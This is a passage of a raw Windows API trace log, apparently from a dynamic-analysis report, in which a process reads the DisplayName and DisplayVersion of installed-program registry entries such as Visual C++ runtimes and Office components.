lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.246] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.246] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.246] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="MPlayer2", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.246] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.246] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.246] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.246] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.246] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.246] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.247] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.247] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.247] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.247] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.247] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.247] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.247] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x7e) returned 0x0 [0286.247] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21c9c08, lpcbData=0x19f2e0*=0x7e | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508", lpcbData=0x19f2e0*=0x7e) returned 0x0 [0286.247] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x18) returned 0x0 [0286.247] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21c9d74, lpcbData=0x19f2e0*=0x18 | out: lpType=0x19f2e4*=0x1, lpData="14.25.28508", lpcbData=0x19f2e0*=0x18) returned 0x0 [0286.325] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.325] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.326] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x76) returned 0x0 [0286.326] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21cf640, lpcbData=0x19f2e0*=0x76 | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005", lpcbData=0x19f2e0*=0x76) returned 0x0 [0286.326] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.326] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21cf79c, lpcbData=0x19f2e0*=0x16 | out: lpType=0x19f2e4*=0x1, lpData="12.0.21005", lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.326] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.327] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.327] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.327] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.327] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.327] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.327] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.327] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.327] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.327] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.327] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.328] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.328] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.328] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.328] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.328] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.328] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.328] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.328] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.328] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.328] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.329] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.329] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.329] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.329] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.329] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.329] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.329] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x0, lpData=0x0, lpcbData=0x19f2e0*=0x0) returned 0x2 [0286.329] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.329] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.329] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x78) returned 0x0 [0286.330] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d07c0, lpcbData=0x19f2e0*=0x78 | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508", lpcbData=0x19f2e0*=0x78) returned 0x0 [0286.330] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x18) returned 0x0 [0286.330] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d091c, lpcbData=0x19f2e0*=0x18 | out: lpType=0x19f2e4*=0x1, lpData="14.25.28508", lpcbData=0x19f2e0*=0x18) returned 0x0 [0286.330] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.330] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.330] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x7a) returned 0x0 [0286.330] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d0c94, lpcbData=0x19f2e0*=0x7a | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030", lpcbData=0x19f2e0*=0x7a) returned 0x0 [0286.330] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x1a) returned 0x0 [0286.330] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d0df8, lpcbData=0x19f2e0*=0x1a | out: lpType=0x19f2e4*=0x1, lpData="11.0.61030.0", lpcbData=0x19f2e0*=0x1a) returned 0x0 [0286.331] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.331] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{3c3aafc8-d898-43ec-998f-965ffdae065a}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.331] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x7a) returned 0x0 [0286.331] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d117c, lpcbData=0x19f2e0*=0x7a | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501", lpcbData=0x19f2e0*=0x7a) returned 0x0 [0286.332] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x1a) returned 0x0 [0286.335] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d12e0, lpcbData=0x19f2e0*=0x1a | out: lpType=0x19f2e4*=0x1, lpData="12.0.30501.0", lpcbData=0x19f2e0*=0x1a) returned 0x0 [0286.335] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.335] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.336] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x86) returned 0x0 [0286.336] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d1690, lpcbData=0x19f2e0*=0x86 | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpcbData=0x19f2e0*=0x86) returned 0x0 [0286.336] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x1c) returned 0x0 [0286.336] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d180c, lpcbData=0x19f2e0*=0x1c | out: lpType=0x19f2e4*=0x1, lpData="14.25.28508.3", lpcbData=0x19f2e0*=0x1c) returned 0x0 [0286.336] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.336] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.336] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x86) returned 0x0 [0286.336] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d1ba0, lpcbData=0x19f2e0*=0x86 | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpcbData=0x19f2e0*=0x86) returned 0x0 [0286.337] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x1c) returned 0x0 [0286.337] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d1d1c, lpcbData=0x19f2e0*=0x1c | out: lpType=0x19f2e4*=0x1, lpData="14.25.28508.3", lpcbData=0x19f2e0*=0x1c) returned 0x0 [0286.337] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.337] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.337] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x54) returned 0x0 [0286.337] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d20b0, lpcbData=0x19f2e0*=0x54 | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2005 Redistributable", lpcbData=0x19f2e0*=0x54) returned 0x0 [0286.338] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x14) returned 0x0 [0286.338] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d21c4, lpcbData=0x19f2e0*=0x14 | out: lpType=0x19f2e4*=0x1, lpData="8.0.61001", lpcbData=0x19f2e0*=0x14) returned 0x0 [0286.338] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.338] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{90160000-008C-0000-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.338] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x5e) returned 0x0 [0286.338] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d250c, lpcbData=0x19f2e0*=0x5e | out: lpType=0x19f2e4*=0x1, lpData="Office 16 Click-to-Run Extensibility Component", lpcbData=0x19f2e0*=0x5e) returned 0x0 [0286.338] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x1e) returned 0x0 [0286.338] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d2638, lpcbData=0x19f2e0*=0x1e | out: lpType=0x19f2e4*=0x1, lpData="16.0.4266.1003", lpcbData=0x19f2e0*=0x1e) returned 0x0 [0286.338] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.339] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{90160000-008C-0409-0000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.339] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x5c) returned 0x0 [0286.339] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d29f8, lpcbData=0x19f2e0*=0x5c | out: lpType=0x19f2e4*=0x1, lpData="Office 16 Click-to-Run Localization Component", lpcbData=0x19f2e0*=0x5c) returned 0x0 [0286.339] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x1e) returned 0x0 [0286.339] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d2b1c, lpcbData=0x19f2e0*=0x1e | out: lpType=0x19f2e4*=0x1, lpData="16.0.4266.1003", lpcbData=0x19f2e0*=0x1e) returned 0x0 [0286.339] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.339] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{9BE518E6-ECC6-35A9-88E4-87755C07200F}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.340] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x7e) returned 0x0 [0286.340] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d2e90, lpcbData=0x19f2e0*=0x7e | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161", lpcbData=0x19f2e0*=0x7e) returned 0x0 [0286.340] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x1e) returned 0x0 [0286.340] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d2ffc, lpcbData=0x19f2e0*=0x1e | out: lpType=0x19f2e4*=0x1, lpData="9.0.30729.6161", lpcbData=0x19f2e0*=0x1e) returned 0x0 [0286.340] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.340] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{B175520C-86A2-35A7-8619-86DC379688B9}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.340] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x7c) returned 0x0 [0286.340] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d3390, lpcbData=0x19f2e0*=0x7c | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030", lpcbData=0x19f2e0*=0x7c) returned 0x0 [0286.341] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.341] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d34f4, lpcbData=0x19f2e0*=0x16 | out: lpType=0x19f2e4*=0x1, lpData="11.0.61030", lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.341] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.341] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.341] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x76) returned 0x0 [0286.341] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d3870, lpcbData=0x19f2e0*=0x76 | out: lpType=0x19f2e4*=0x1, lpData="Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030", lpcbData=0x19f2e0*=0x76) returned 0x0 [0286.341] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, lpcbData=0x19f2e0*=0x0 | out: lpType=0x19f2e4*=0x1, lpData=0x0, lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.341] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19f2e4, lpData=0x21d39cc, lpcbData=0x19f2e0*=0x16 | out: lpType=0x19f2e4*=0x1, lpData="11.0.61030", lpcbData=0x19f2e0*=0x16) returned 0x0 [0286.341] RegCloseKey (hKey=0x2f0) returned 0x0 [0286.342] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f2c4 | out: phkResult=0x19f2c4*=0x2f0) returned 0x0 [0286.342] RegQueryValueExW (in: hKey=0x2f0, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19f2e4, lpData=0x0, 